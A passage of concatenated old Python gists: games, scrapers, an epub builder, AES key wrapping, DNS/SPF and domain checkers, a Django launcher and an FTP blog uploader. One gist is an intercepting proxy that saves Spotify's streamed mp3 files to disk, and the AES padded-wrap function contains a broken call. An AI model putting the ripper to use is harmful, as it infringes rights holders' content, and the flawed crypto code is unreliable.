bullet.vy = 15
bullet.vx = vx
bullet.pass_through = True
self.bullets.append(bullet)
else:
bullet = Bullet(self.player.x, 110)
bullet.vy = 15
self.bullets.append(bullet)
play_effect('Laser_6')
self.shot_fired = True
def draw_status_bar(self):
hue = (self.energy / 100.0) * 0.35 + 1.0
r, g, b = hsv_to_rgb(hue, 1, 1)
fill(r, g, b)
rect(0, self.size.h - 5, self.energy / 100.0 * self.size.w, 5)
text(str(self.score), 'Futura', 40,
self.size.w / 2, self.size.h - 60)
def explosion(self, enemy):
for i in xrange(int(enemy.size / 6)):
s = enemy.size / 5
l = Layer(Rect(enemy.x - s/2, enemy.y - s/2, s, s))
l.background = enemy.color
l.animate('frame', Rect(enemy.x + randint(-100, 100),
enemy.y + randint(-100, 100),
s/3, s/3), curve=curve_ease_out)
l.animate('alpha', 0.0, 0.5, completion=l.remove_layer)
self.effects_layer.add_layer(l)
run(Game(), PORTRAIT)
```
#### File: hard-gists/4070026/snippet.py
```python
import subprocess
import sublime, sublime_plugin
import re
# RailsCopyMigrationVersion
# ========
#
# A Sublime Text 2 plugin that provides `copy_migration_version` command to copy migration version of current migration file.
#
class CopyMigrationVersionCommand(sublime_plugin.TextCommand):
def run(self, edit):
match = re.search('\d{14}', self.view.file_name())
if match:
version = match.group()
sublime.set_clipboard(version)
sublime.status_message("copied: %s" % version)
```
#### File: hard-gists/4089133/snippet.py
```python
import random
import hashlib
from libmproxy import proxy, flow
class SpotifyProxy(flow.FlowMaster):
def run(self):
try:
flow.FlowMaster.run(self)
except KeyboardInterrupt:
self.shutdown()
def handle_request(self, r):
f = flow.FlowMaster.handle_request(self, r)
if f:
r._ack()
return f
def handle_response(self, r):
f = flow.FlowMaster.handle_response(self, r)
if f:
r._ack()
if 'cloudfront.net' in f.request.host and 'mp3' in f.request.path:
filename = '%s.mp3' % hashlib.sha1(str(random.random())).hexdigest()
mp3 = open(filename, 'w')
mp3.write(f.response.content)
mp3.close()
print "Saved to %s" % filename
return f
config = proxy.ProxyConfig()
state = flow.State()
server = proxy.ProxyServer(config, 9000)
m = SpotifyProxy(server, state)
m.run()
```
#### File: hard-gists/4104455/snippet.py
```python
import re, ez_epub, urllib2, genshi
from BeautifulSoup import BeautifulSoup
def addSection(link, title):
if not 'http' in link:
page = urllib2.urlopen('http://www.paulgraham.com/'+link).read()
soup = BeautifulSoup(page)
soup.prettify()
else:
page = urllib2.urlopen(link).read()
section = ez_epub.Section()
try:
section.title = title
print section.title
if not 'http' in link:
font = str(soup.findAll('table', {'width':'455'})[0].findAll('font')[0])
if not 'Get funded by' in font and not 'Watch how this essay was' in font and not 'Like to build things?' in font and not len(font)<100:
content = font
else:
content = ''
for par in soup.findAll('table', {'width':'455'})[0].findAll('p'):
content += str(par)
for p in content.split("<br /><br />"):
section.text.append(genshi.core.Markup(p))
#exception for Subject: Airbnb
for pre in soup.findAll('pre'):
section.text.append(genshi.core.Markup(pre))
else:
for p in str(page).replace("\n","<br />").split("<br /><br />"):
section.text.append(genshi.core.Markup(p))
except:
pass
return section
book = ez_epub.Book()
book.title = "Paul Graham's Essays"
book.authors = ['<NAME>']
page = urllib2.urlopen('http://www.paulgraham.com/articles.html').read()
soup = BeautifulSoup(page)
soup.prettify()
links = soup.findAll('table', {'width': '455'})[1].findAll('a')
sections = []
for link in links:
sections.append(addSection(link['href'], link.text))
book.sections = sections
book.make(book.title)
```
#### File: hard-gists/4130c73434db79119f27/snippet.py
```python
import logging
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
class CloudLoggingHandler(logging.Handler):
def __init__(self, project_id):
logging.Handler.__init__(self)
self.project_id = project_id
credentials = GoogleCredentials.get_application_default()
self.logging_api = build('logging', 'v2beta1', credentials=credentials)
def emit(self, record):
print(str(record))
self.logging_api.entries().write(
body={
"entries": [
{
"severity": record.levelname,
"jsonPayload": {
"module": record.module,
"message": record.getMessage()
},
"logName": "projects/" + self.project_id + "/logs/" + record.name,
"resource": {
"type": "global",
}
}
]
}
).execute()
```
#### File: hard-gists/4131398/snippet.py
```python
from IPython.core.display import Image as image
from PIL import Image
def save_and_display(arr, fname):
pilimg = Image.fromarray(arr)
pilimg.save(fname)
return image(filename=fname, width=600)
```
#### File: hard-gists/4180945/snippet.py
```python
from scene import *
from PIL import Image
import urllib, os
start = Point(3, 1) #the sheet has 8 sets of characters in a 4x2 grid.
ssize = Size(96, 128)
speed = 0.15
frames = [0, 1, 2, 1] #4 frames per walk cycle
dirs = [0, 3, 9, 6] #start frame for direction
moveamt = 32
mov = [(0, -moveamt), (-moveamt, 0), (0, moveamt), (moveamt, 0)]
keycolor = (0, 255, 0, 255)
gravsense = 0.06
north = 0
south = 2
east = 1
west = 3
def wrap(v, ext):
if v < 0:
return ext + v
elif v >= ext:
return v - ext
return v
def gravitydirections(dir):
ax = abs(dir.x)
ay = abs(dir.y)
dx = 0
dy = 0
#If x is larger than the sensitivity then set east or west.
if ax > gravsense:
dx = west if dir.x > 0 else east
#If y is larger than the sensitivity then set north or south.
if ay > gravsense:
dy = south if dir.y > 0 else north
#return direction tuple in order of largest gravity direction.
return dy if ay > ax else dx
class MyScene (Scene):
def setup(self):
# This will be called before the first frame is drawn.
if not os.path.exists('Images'):
os.mkdir('Images')
if not os.path.exists("Images/soldier2.png"):
url = urllib.urlopen('http://img63.imageshack.us/img63/4348/americanset.png')
with open("Images/soldier2.png", "wb") as output:
output.write(url.read())
img = Image.open("Images/soldier2.png").convert('RGBA')
img.show()
strt = Point(start.x * ssize.w, start.y * ssize.h)
img = img.crop((strt.x, strt.y,strt.x + ssize.w - 1, strt.y + ssize.h - 1))
d = img.load()
keycolor = d[0,0] #1st pixel is used as keycolor.
for x in range(img.size[0]):
for y in range(img.size[1]):
p = d[x, y]
if p == keycolor: #if keycolor set alpha to 0.
d[x, y] = (p[0], p[1], p[2], 0)
img.show()
def getframe(x, y):
nim = img.crop((x * 32, y * 32, (x+1) * 32, (y+1) * 32))
# nim = nim.resize((16,16), Image.ANTIALIAS)
return load_pil_image(nim)
self.images = [ getframe(x,y) for y in xrange(4) for x in xrange(3) ]
self.start = 0
self.base = 0
self.dir = 0
self.delay = speed
self.x = 400
self.y = 400
def draw(self):
# This will be called for every frame (typically 60 times per second).
self.dir = gravitydirections(gravity())
background(0, 0, 1)
d = self.dir
mv = mov[d]
self.x += mv[0] * self.dt
self.y += mv[1] * self.dt
self.x = wrap(self.x, self.size.w)
self.y = wrap(self.y, self.size.h)
image(self.images[dirs[d] + frames[self.start]], self.x, self.y, 32, 32)
self.delay -= self.dt
if self.delay <= 0:
self.delay += speed
self.start += 1
if self.start >= len(frames):
self.start = 0
run(MyScene(), PORTRAIT)
```
#### File: hard-gists/4217925/snippet.py
```python
from ghost import Ghost
from PySide.QtGui import QApplication, QImage, QPainter, QPrinter
class MyGhost(Ghost):
def capture_pdf(self):
printer = QPrinter(QPrinter.HighResolution)
printer.setResolution(300)
printer.setOutputFileName("QtPrinter.pdf")
printer.setPaperSize(QPrinter.A4)
printer.setOrientation(QPrinter.Landscape)
printer.setOutputFormat(QPrinter.PdfFormat)
painter = QPainter(printer)
self.main_frame.render(painter)
painter.end()
ghost = MyGhost(viewport_size=(1280,960))
page, resources = ghost.open('http://127.0.0.1:8000/path/to/page/to/capture/')
ghost.capture_pdf()
```
#### File: hard-gists/4243633/snippet.py
```python
import struct
from Crypto.Cipher import AES
QUAD = struct.Struct('>Q')
def aes_unwrap_key_and_iv(kek, wrapped):
n = len(wrapped)/8 - 1
#NOTE: R[0] is never accessed, left in for consistency with RFC indices
R = [None]+[wrapped[i*8:i*8+8] for i in range(1, n+1)]
A = QUAD.unpack(wrapped[:8])[0]
decrypt = AES.new(kek).decrypt
for j in range(5,-1,-1): #counting down
for i in range(n, 0, -1): #(n, n-1, ..., 1)
ciphertext = QUAD.pack(A^(n*j+i)) + R[i]
B = decrypt(ciphertext)
A = QUAD.unpack(B[:8])[0]
R[i] = B[8:]
return "".join(R[1:]), A
#key wrapping as defined in RFC 3394
#http://www.ietf.org/rfc/rfc3394.txt
def aes_unwrap_key(kek, wrapped, iv=0xa6a6a6a6a6a6a6a6):
key, key_iv = aes_unwrap_key_and_iv(kek, wrapped)
if key_iv != iv:
raise ValueError("Integrity Check Failed: "+hex(key_iv)+" (expected "+hex(iv)+")")
return key
#alternate initial value for aes key wrapping, as defined in RFC 5649 section 3
#http://www.ietf.org/rfc/rfc5649.txt
def aes_unwrap_key_withpad(kek, wrapped):
if len(wrapped) == 16:
plaintext = AES.new(kek).decrypt(wrapped)
key, key_iv = plaintext[:8], plaintext[8:]
else:
key, key_iv = aes_unwrap_key_and_iv(kek, wrapped)
key_iv = "{0:016X}".format(key_iv)
if key_iv[:8] != "A65959A6":
raise ValueError("Integrity Check Failed: "+key_iv[:8]+" (expected A65959A6)")
key_len = int(key_iv[8:], 16)
return key[:key_len]
def aes_wrap_key(kek, plaintext, iv=0xa6a6a6a6a6a6a6a6):
n = len(plaintext)/8
R = [None]+[plaintext[i*8:i*8+8] for i in range(0, n)]
A = iv
encrypt = AES.new(kek).encrypt
for j in range(6):
for i in range(1, n+1):
B = encrypt(QUAD.pack(A) + R[i])
A = QUAD.unpack(B[:8])[0] ^ (n*j + i)
R[i] = B[8:]
return QUAD.pack(A) + "".join(R[1:])
def aes_wrap_key_withpad(kek, plaintext):
iv = 0xA65959A600000000 + len(plaintext)
plaintext = plaintext + "\0" * ((8 - len(plaintext)) % 8)
if len(plaintext) == 8:
return AES.new(kek).encrypt(QUAD.pack[iv] + plaintext)
return aes_wrap_key(kek, plaintext, iv)
def test():
#test vector from RFC 3394
import binascii
KEK = binascii.unhexlify("000102030405060708090A0B0C0D0E0F")
CIPHER = binascii.unhexlify("1FA68B0A8112B447AEF34BD8FB5A7B829D3E862371D2CFE5")
PLAIN = binascii.unhexlify("00112233445566778899AABBCCDDEEFF")
assert aes_unwrap_key(KEK, CIPHER) == PLAIN
assert aes_wrap_key(KEK, PLAIN) == CIPHER
```
#### File: hard-gists/42472327b4be382b02eb/snippet.py
```python
from pygit2 import Repository
from pygit2 import GIT_SORT_TOPOLOGICAL, GIT_SORT_REVERSE
import datetime
import json
import sys
class TzOffset(datetime.tzinfo):
def __init__(self, offset=19800, name=None):
self.offset = datetime.timedelta(seconds=offset)
self.name = name or self.__class__.__name__
def utcoffset(self, dt):
return self.offset
def tzname(self, dt):
return self.name
def dst(self, dt):
return datetime.timedelta(0)
def fmtdate(obj):
tz = TzOffset(offset=obj.offset*60, name=None)
date = datetime.datetime.fromtimestamp(obj.time, tz)
return date.strftime('%Y-%m-%d %H:%M:%S%z')
repo = Repository('.git')
commits = []
for commit in repo.walk(repo.head.target, GIT_SORT_TOPOLOGICAL):
obj = {
"commit": commit.hex,
"abbreviated_commit": commit.hex[0:10],
"tree": commit.tree.hex,
"abbreviated_tree": commit.tree.hex[0:10],
"parents": [x.hex for x in commit.parents],
"abbreviated_parents": [x.hex[0:10] for x in commit.parents],
"encoding": commit.message_encoding or '',
"subject": commit.message.split('\n')[0],
"body": commit.message,
"author": {
"name": commit.author.name,
"email": commit.author.email,
"date": fmtdate(commit.author)
},
"commiter": {
"name": commit.committer.name,
"email": commit.committer.email,
"date": fmtdate(commit.committer)
}
}
commits.append(obj)
json.dump(commits, sys.stdout, indent=4, sort_keys=True)
```
#### File: hard-gists/4349257/snippet.py
```python
import os
import webbrowser
from threading import Timer
os.environ["DJANGO_SETTINGS_MODULE"] = "webapp.settings"
import cherrypy
from django.conf import settings
from django.core.handlers.wsgi import WSGIHandler
class DjangoApplication(object):
HOST = "127.0.0.1"
PORT = 8001
def mount_static(self, url, root):
"""
:param url: Relative url
:param root: Path to static files root
"""
config = {
'tools.staticdir.on': True,
'tools.staticdir.dir': root,
'tools.expires.on': True,
'tools.expires.secs': 86400
}
cherrypy.tree.mount(None, url, {'/': config})
def open_browser(self):
Timer(3, webbrowser.open, ("http://%s:%s" % (self.HOST, self.PORT),)).start()
def run(self):
cherrypy.config.update({
'server.socket_host': self.HOST,
'server.socket_port': self.PORT,
'engine.autoreload_on': False,
'log.screen': True
})
self.mount_static(settings.STATIC_URL, settings.STATIC_ROOT)
cherrypy.log("Loading and serving Django application")
cherrypy.tree.graft(WSGIHandler())
cherrypy.engine.start()
self.open_browser()
cherrypy.engine.block()
if __name__ == "__main__":
print "Your app is running at http://localhost:8001"
DjangoApplication().run()
```
#### File: hard-gists/4350345/snippet.py
```python
from pymongo import Connection
from bson import ObjectId
from itertools import imap
class Model(dict):
"""
A simple model that wraps mongodb document
"""
__getattr__ = dict.get
__delattr__ = dict.__delitem__
__setattr__ = dict.__setitem__
def save(self):
if not self._id:
self.collection.insert(self)
else:
self.collection.update(
{ "_id": ObjectId(self._id) }, self)
def reload(self):
if self._id:
self.update(self.collection\
.find_one({"_id": ObjectId(self._id)}))
def remove(self):
if self._id:
self.collection.remove({"_id": ObjectId(self._id)})
self.clear()
# ------------------------------
# Here is the example model
# ------------------------------
class Document(Model):
collection = Connection()["test_database"]["test_collections"]
@property
def keywords(self):
return self.title.split()
# ------------------------------
# Mapping documents to the model
# ------------------------------
documents = imap(Document, Document.collection.find())
# that's all
for document in documents:
print document.title, document.keywords
# ------------------------------
# Creating new document
# ------------------------------
document = Document({
"title": "test document",
"slug": "test-document"
})
print document._id # none
document.save()
print document._id # "50d3cb0068c0064a21e76be4"
# -------------------------
# Getting a single document
# -------------------------
document = Document({
"_id": "50d3cb0068c0064a21e76be4"
})
print document.title # None
document.reload()
print document.title # "test document"
# -----------------
# Updating document
# -----------------
document.title = "test document 2"
document.save()
print document.title # "test document 2"
document.reload()
print document.title # "test document 2"
# -----------------
# Removing document
# -----------------
document.remove()
print document # {}
```
#### File: hard-gists/4427984/snippet.py
```python
from optparse import OptionParser
import logging
import logging.handlers
import os
import sys
import urllib2
if __name__ != '__main__':
import dns.resolver
def get_logger(logdir, debug):
"""docstring for get_logger"""
logname = 'dontpanic.log'
logdir = logdir or '.'
debug = debug or False
logger = logging.getLogger()
#formatter = logging.Formatter(
#'%(asctime)s - %(levelname)s - %(message)s')
if debug:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
logfile_handler = logging.handlers.RotatingFileHandler(
os.path.join(logdir, logname)
)
stream_handler = logging.StreamHandler()
#logfile.setFormatter(formatter)
logger.addHandler(logfile_handler)
logger.addHandler(stream_handler)
logger.debug("Logger initialized ... ")
return logger
class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_301(self, req, fp, code, msg, headers):
result = urllib2.HTTPRedirectHandler.http_error_301(
self, req, fp, code, msg, headers)
result.status = code
return result
def http_error_302(self, req, fp, code, msg, headers):
result = urllib2.HTTPRedirectHandler.http_error_302(
self, req, fp, code, msg, headers)
result.status = code
return result
class DefaultErrorHandler(urllib2.HTTPDefaultErrorHandler):
def http_error_default(self, req, fp, code, msg, headers):
result = urllib2.HTTPError(
req.get_full_url(), code, msg, headers, fp)
result.status = code
return result
class Parser(object):
def parse_nginx_conf(self, nginx_file):
"""
"""
domains = []
logger.debug("Starting parsing nginx conf file: %s", nginx_file)
with open(nginx_file) as conf:
for line in conf:
if "server_name " in line and "#" not in line:
line_domains = line.strip().replace("server_name ", "")
line_domains = line_domains.replace(";", "").split()
domains.extend(line_domains)
logger.debug("Added %s domains from nginx conf file: %s", domains, nginx_file)
logger.debug("Parsing nginx conf: %s completed\n", nginx_file)
return domains
def parse_apache_conf(self, apache_file):
"""
"""
domains = []
logger.debug("Starting parsing apache conf file: %s", apache_file)
with open(apache_file) as conf:
for line in conf:
if "ServerAlias" in line and "#" not in line:
line_domains = line.strip().replace("ServerAlias", "").split()
domains.extend(line_domains)
logger.debug("Added %s domains from apache conf file: %s", domains, apache_file)
logger.debug("Parsing apache conf completed\n")
return domains
def _file_list(self, directory):
"""
"""
for dirname, dirnames, filenames in os.walk(directory):
for filename in filenames:
yield os.path.join(dirname, filename)
def parse_nginx_dir(self, nginx_dir):
"""docstring for parse_nginx_dir"""
domains = []
for conf in self._file_list(nginx_dir):
domains += self.parse_nginx_conf(conf)
return domains
def parse_apache_dir(self, apache_dir):
"""docstring for parse_apache_dir"""
domains = []
for conf in self._file_list(apache_dir):
domains += self.parse_apache_conf(conf)
return domains
class DomainChecker(object):
def __init__(self, timeout=3, agent="dontpanic/1.0"):
self.timeout = timeout
self.agent = agent
self.opener = urllib2.build_opener()
def _build_request(self, url):
self.url = url
if not self.url.startswith("http"):
tmp = "http://" + url
self.hurl = tmp
request = urllib2.Request(self.hurl)
request.add_header('User-Agent', self.agent)
request.add_header('Accept-encoding', 'gzip')
return request
def get_code(self, url):
response = self.opener.open(self._build_request(url))
if hasattr(response, 'status'):
return response.status
else:
return response.code
def check_domain(self, domain, our_ip_list=None):
oklist, foolist = [], []
code = None
our_shit = False
# XXX
if our_ip_list is None:
our_shit = True
else:
try:
answers = dns.resolver.query(domain, 'A')
for answer in answers:
if answer.address in our_ip_list:
our_shit = True
except:
pass
try:
code = self.get_code(domain)
except urllib2.HTTPError, e:
if our_shit:
logger.info("%s retuned %s -- BAD", domain, e.code)
else:
logger.info("%s retuned %s -- BAD (Not our problem hosted at %s)", domain, e.code, answer.address)
code = e.code
except urllib2.URLError, e:
logger.info("%s %s -- SUPER BAD (domain not registered or no DNS record)", domain, e.reason)
if code in (200, 301, 302):
if our_shit:
logger.info("%s retuned %s -- OK", domain, code)
else:
logger.info("%s retuned %s -- OK (Not our problem hosted at %s)", domain, code, answer.address)
oklist.append(domain)
else:
foolist.append(domain)
return foolist
if __name__ == "__main__":
parser = OptionParser()
parser.usage = "%prog [options]" + __doc__
parser.add_option("-n", "--nginx-conf-dir", dest="nginx_dir",
help="directory with nginx conf files", metavar="NDIR")
parser.add_option("-a", "--apache-conf-dir", dest="apache_dir",
help="directory with apache conf files", metavar="ADIR")
parser.add_option("-l", "--log-dir", dest="logdir",
help="write report to LOGDIR", metavar="LOGDIR")
parser.add_option("-d", "--debug",
dest="debug", default=False,
help="debug mode")
parser.add_option("-i", "--ips",
dest="ips", default=None,
help="ip or ips of our server (will activate dns resolver)")
args = parser.parse_args()[0]
logger = get_logger(args.logdir, args.debug)
logger.info('Starting ...')
p = Parser()
dc = DomainChecker()
nginx_domains, apache_domains = [], []
if getattr(args, 'nginx_dir') is not None:
nginx_domains = p.parse_nginx_dir(args.nginx_dir)
if getattr(args, 'apache_dir') is not None:
apache_domains = p.parse_apache_dir(args.apache_dir)
domains = nginx_domains + apache_domains
if args.ips:
try:
import dns.resolver
except ImportError:
print 'You need to install python-pythondns package.'
if not domains:
print 'No domains found !'
logger.info('No domains found !')
sys.exit(0)
logger.info("Start checking the domains ...")
for domain in domains:
dc.check_domain(domain, args.ips)
logger.info("Ending ...\n\n\n")
```
#### File: hard-gists/4451253/snippet.py
```python
from scrapy.spider import BaseSpider
class MindhacksSpider(BaseSpider):
domain_name = "mindhacks.cn"
start_urls = ["http://mindhacks.cn/"]
def parse(self, response):
return []
SPIDER = MindhacksSpider()
#######################################################
from scrapy.selector import HtmlXPathSelector
from scrapy.spider import BaseSpider
from scrapy.http import Request
from myproject.items import MyItem
class MySpider(BaseSpider):
name = 'example.com'
allowed_domains = ['example.com']
start_urls = [
'http://www.example.com/1.html',
'http://www.example.com/2.html',
'http://www.example.com/3.html',
]
def parse(self, response):
hxs = HtmlXPathSelector(response)
for h3 in hxs.select('//h3').extract():
yield MyItem(title=h3)
for url in hxs.select('//a/@href').extract():
yield Request(url, callback=self.parse)
############################################################
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import HtmlXPathSelector
from scrapy.item import Item
class MySpider(CrawlSpider):
name = 'example.com'
allowed_domains = ['example.com']
start_urls = ['http://www.example.com']
rules = (
# Extract links matching 'category.php' (but not matching 'subsection.php')
# and follow links from them (since no callback means follow=True by default).
Rule(SgmlLinkExtractor(allow=('category\.php', ), deny=('subsection\.php', ))),
# Extract links matching 'item.php' and parse them with the spider's method parse_item
Rule(SgmlLinkExtractor(allow=('item\.php', )), callback='parse_item'),
)
def parse_item(self, response):
self.log('Hi, this is an item page! %s' % response.url)
hxs = HtmlXPathSelector(response)
item = Item()
item['id'] = hxs.select('//td[@id="item_id"]/text()').re(r'ID: (\d+)')
item['name'] = hxs.select('//td[@id="item_name"]/text()').extract()
item['description'] = hxs.select('//td[@id="item_description"]/text()').extract()
return item
################################################################################################
from scrapy import log
from scrapy.contrib.spiders import XMLFeedSpider
from myproject.items import TestItem
class MySpider(XMLFeedSpider):
name = 'example.com'
allowed_domains = ['example.com']
start_urls = ['http://www.example.com/feed.xml']
iterator = 'iternodes' # This is actually unnecesary, since it's the default value
itertag = 'item'
def parse_node(self, response, node):
log.msg('Hi, this is a <%s> node!: %s' % (self.itertag, ''.join(node.extract())))
item = Item()
item['id'] = node.select('@id').extract()
item['name'] = node.select('name').extract()
item['description'] = node.select('description').extract()
return item
#########################################################################
from scrapy import log
from scrapy.contrib.spiders import CSVFeedSpider
from myproject.items import TestItem
class MySpider(CSVFeedSpider):
name = 'example.com'
allowed_domains = ['example.com']
start_urls = ['http://www.example.com/feed.csv']
delimiter = ';'
headers = ['id', 'name', 'description']
def parse_row(self, response, row):
log.msg('Hi, this is a row!: %r' % row)
item = TestItem()
item['id'] = row['id']
item['name'] = row['name']
item['description'] = row['description']
return item
##########################################################################
def parse(self, response):
items = []
hxs = HtmlXPathSelector(response)
posts = hxs.x('//h1/a/@href').extract()
items.extend([self.make_requests_from_url(url).replace(callback=self.parse_post)
for url in posts])
page_links = hxs.x('//div[@class="wp-pagenavi"]/a[not(@title)]')
for link in page_links:
if link.x('text()').extract()[0] == u'\xbb':
url = link.x('@href').extract()[0]
items.append(self.make_requests_from_url(url))
return items
################################################################################
def parse_post(self, response):
item = BlogCrawlItem()
item.url = unicode(response.url)
item.raw = response.body_as_unicode()
return [item]
################################################################################
class BlogCrawlItem(ScrapedItem):
def __init__(self):
ScrapedItem.__init__(self)
self.url = ''
def __str__(self):
return 'BlogCrawlItem(url: %s)' % self.url
################################################################################
```
#### File: hard-gists/446bcbe699d4fb54972f/snippet.py
```python
import argparse
import json
from pyOSC import OSC
from SimpleWebSocketServer import WebSocket, SimpleWebSocketServer
# arguments
parser = argparse.ArgumentParser(description='Websocket to OSC bridge')
parser.add_argument('websocket',
type=int,
nargs='?',
default=7776,
help='The port for WebSocket')
parser.add_argument('osc',
type=int,
nargs='?',
default=7777,
help='The port for OSC')
class OscBridge(WebSocket):
''' Websocket to OSC bridge '''
def __init__(self, server, sock, address):
super(OscBridge, self).__init__(server, sock, address)
args = parser.parse_args()
self.oscClient = OSC.OSCClient()
self.oscClient.connect(('127.0.0.1', args.osc))
def parseMsg(self, address, msg):
messages = []
if isinstance(msg, dict):
[messages.extend(self.parseMsg(address + '/' + k, v))
for k, v in msg.items()]
elif isinstance(msg, list):
if isinstance(msg[0], dict) or isinstance(msg[0], list):
[messages.extend(self.parseMsg(address, m)) for m in msg]
else:
messages.append(self.createOsc(address, msg))
else:
messages.append(self.createOsc(address, [msg]))
return messages
def createOsc(self, address, params):
msg = OSC.OSCMessage(address)
[msg.append(param) for param in params]
return msg
def handleMessage(self):
msg = json.loads(self.data)
oscMsgs = []
[oscMsgs.extend(self.parseMsg('/' + address, msg))
for address, msg in msg.items()]
bundle = OSC.OSCBundle()
[bundle.append(osc) for osc in oscMsgs]
self.oscClient.send(bundle)
print(oscMsgs)
def handleConnected(self):
print self.address, 'connected'
def handleClose(self):
print self.address, 'closed'
if __name__ == '__main__':
args = parser.parse_args()
server = SimpleWebSocketServer('', args.websocket, OscBridge)
server.serveforever()
```
#### File: hard-gists/4471462/snippet.py
```python
from __future__ import print_function
from collections import defaultdict
import sys
import DNS
import re
RE_PARSE = re.compile(r'(ip4|ip6|include|redirect)[:=](.*)', re.IGNORECASE)
MAX_RECURSION = 5
def dns_txt(domain):
try:
resp = DNS.dnslookup(domain, 'TXT')
except DNS.ServerError as err:
print(err, file=sys.stderr)
return None
response = []
for r in resp:
response.append(''.join(r))
return response
def dns_parse(txt_field):
resp = defaultdict(set)
for rec in txt_field:
fields = rec.split()
for field in fields:
match = RE_PARSE.match(field)
if match:
resp[match.group(1)].add(match.group(2))
return resp
def process(domain):
domains = [domain]
ip_addresses = set()
for cnt in range(MAX_RECURSION):
includes = set()
for dom in domains:
txt = dns_txt(dom)
if not txt:
continue
spf = dns_parse(txt)
ip_addresses |= spf.get('ip4', set())
ip_addresses |= spf.get('ip6', set())
includes |= spf.get('include', set())
includes |= spf.get('redirect', set())
if not includes:
break
domains = includes
return ip_addresses
if __name__ == '__main__':
whitelist = set()
with open(sys.argv[1]) as fd:
for line in fd:
line = line.strip()
for ip in process(line):
whitelist.add(ip)
for ip in sorted(whitelist):
print(ip)
```
#### File: hard-gists/4524784/snippet.py
```python
import inspect
from django.conf import settings
from django.utils.importlib import import_module
from django.core.exceptions import ImproperlyConfigured
class AlreadyRegistered(Exception):
pass
class NotRegistered(Exception):
pass
class Registry(object):
"Simple class that keeps track of a set of registered classes."
def __init__(self, default=None, register_instance=True):
if register_instance and inspect.isclass(default):
default = default()
self.register_instance = register_instance
self.default = default
self._registry = {}
if default:
self.register(default)
def __getitem__(self, name):
return self._registry.get(name, self.default)
def get(self, name):
return self.__getitem__(name)
def register(self, obj, name=None):
"""Registers a class with an optional name. The class name will be used
if not supplied.
"""
if inspect.isclass(obj):
name = name or obj.__name__
# Create an instance if instances should be registered
if self.register_instance:
obj = obj()
else:
name = name or obj.__class__.__name__
if name in self._registry:
raise AlreadyRegistered('The class {0} is already registered'.format(name))
# Check to see if this class should be used as the default for this
# registry
if getattr(obj, 'default', False):
# ensure the default if already overriden is not being overriden
# again.
if self.default:
if self.register_instance:
name = self.default.__class__.__name__
else:
name = self.default.__name__
objtype = 'class' if self.register_instance else 'instance'
raise ImproperlyConfigured('The default {0} cannot be set '
'more than once for this registry ({1} is the default).'.format(objtype, name))
self.default = obj
else:
if name in self._registry:
raise AlreadyRegistered('Another class is registered with the '
'name "{0}"'.format(name))
self._registry[name] = obj
def unregister(self, name):
"""Unregisters a class. Note that these calls must be made in
INSTALLED_APPS listed after the apps that already registered the class.
"""
# Use the name of the class if passed in. Second condition checks for an
# instance of the class.
if inspect.isclass(name):
name = name.__name__
elif hasattr(name, '__class__'):
name = name.__class__.__name__
if name not in self._registry:
objtype = 'class' if self.register_instance else 'instance'
raise NotRegistered('No {0} is registered under the name "{1}"'.format(objtype, name))
self._registry.pop(name)
@property
def choices(self):
"Returns a 2-tuple list of all registered class instance names."
return sorted((x, x) for x in self._registry.iterkeys())
def autodiscover(module_name):
"""Simple auto-discover for looking through each INSTALLED_APPS for each
``module_name`` and fail silently when not found. This should be used for
modules that have 'registration' like behavior.
"""
for app in settings.INSTALLED_APPS:
# Attempt to import the app's ``module_name``.
try:
import_module('{0}.{1}'.format(app, module_name))
except:
pass
```
#### File: hard-gists/4555911/snippet.py
```python
import Image, ImageOps, ImageFilter
import ftplib
from string import Template
import datetime
from io import BytesIO
import cStringIO
import urllib
from unicodedata import normalize
import sys
import keychain
import console
import clipboard
console.clear()
# FTP credentials. Self explanatory. uses keychain
# to store FTP password
userName = "username"
userPass = keychain.get_password("ftp",userName)
host = "mysite.com"
rootDir = "/public_html/"
# These are specific fields that I want to add to my YAML info
# at the top of my article. You may not have a need for these
# so simply remove them from the code and be sure to clean
# up the 'template' variable below as well as the 'values'
# template way below.
post_template_name = "blog"
author = "admin"
# This is my post template. You can change it to whatever you need
# yours to look like. However, the values are populated down further
# in the script and you will need to ensure that your '$y' variables
# match up otherwise the script will fail in a not so graceful manner. Also, i have a strange way of creating header images for posts.
# It's bot common to have that 'photos' list at the bottom of the template
# you may want to move '$yPhotos' below the dashed lines into your content
template ='''---
title: $yTitle
_templates: $yTemplate
author: $yAuthor
categories:
- $yCategories
status: $yStatus
photos:
- url: $yPhotos
---
$yContent'''
# standard locations for images and content for Statamic
imgBase = "/assets/img/"
contentBase = "/_content/"
imgRemotePath = rootDir + imgBase
txtRemotePath = rootDir + contentBase
# Let's get the image from the clipboard and ask some questions
today = datetime.datetime.now()
image = clipboard.get_image()
imgFileName = console.input_alert("Image Title", "Enter Image File Name")
title = console.input_alert("Article Title", "Enter the article title")
sts = console.alert("Status","Choose the article status","Live","Draft","Hidden")
category = console.input_alert("Post category", "Enter a category")
words = console.input_alert("Article Text", "Enter your thoughts")
imgFileName = imgFileName +'_'+ today.strftime("%Y-%m-%d-%H%M%S") +'.png'
if sts == 1:
status = "live"
elif sts == 2:
status = "draft"
elif sts == 3:
status = "hidden"
# Can we connect to the FTP?
try:
console.show_activity()
ftp = ftplib.FTP(host, userName, userPass)
console.hide_activity()
except Exception as e:
print "Unable to connect to FTP"
# trying to retrieve the folders used in the 'txtRemotePath' directory
# returns a simple dictionary with folders info separated.
def get_folders():
try:
console.show_activity()
ftp.cwd(txtRemotePath)
data = []
ftp.retrlines('MLSD', data.append)
dir = []
for line in data:
facts_found, _, name = line.rstrip('CRLF').partition(' ')
entry = {}
for fact in facts_found[:-1].split(";"):
key, _, value = fact.partition("=")
entry[key.lower()] = value
if entry['type'] == 'dir':
dir.append(name)
count = 0
folders = []
for eachDir in dir:
folder = eachDir.partition("-")[2]
folders.append([count,eachDir,folder])
count +=1
return folders
except Exception as e:
print "Unable to get folder listing"
# Generates the actual text for the article with YAML headers
def make_file(template,values):
yaml_fe = Template(template)
result = yaml_fe.safe_substitute(values)
return result
# Found this at https://gist.github.com/4021956
# this will help when we need to slugify your title for the filename
def slug(text, encoding=None, permitted_chars='abcdefghijklmnopqrstuvwxyz0123456789-'):
if isinstance(text, str):
